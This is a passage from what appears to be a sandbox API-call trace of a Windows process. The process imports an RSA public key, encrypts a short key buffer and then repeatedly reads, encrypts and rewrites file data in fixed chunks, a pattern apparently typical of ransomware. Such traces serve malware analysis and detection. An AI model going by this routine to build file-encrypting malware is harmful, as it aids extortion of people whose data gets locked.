KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0283.200] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0283.200] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1f768) returned 1 [0283.200] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1f768, dwCertEncodingType=0x1, pInfo=0x2f39450*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f39480*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f39488*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc3c8) returned 1 [0283.200] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0283.200] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1fb20*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1fb20*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0283.201] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f1fb20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1fb20*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0283.201] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.484] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.484] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.486] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.486] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.486] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.486] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.486] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.486] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.486] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.486] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.486] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.486] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.545] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.545] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.546] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.546] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.546] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.546] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.546] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.546] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.546] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.546] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.546] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.554] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.554] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.554] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.554] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.554] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.555] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.555] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.555] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.555] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.555] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.555] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.555] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.555] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.556] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.556] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.556] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.556] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.556] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.557] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.557] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.557] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.557] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.557] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.557] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.557] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.557] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.558] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.558] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.558] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.558] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.558] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.558] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.558] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.559] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.559] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.559] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.559] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.559] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.560] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.560] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.560] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.560] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.560] CryptEncrypt (in: 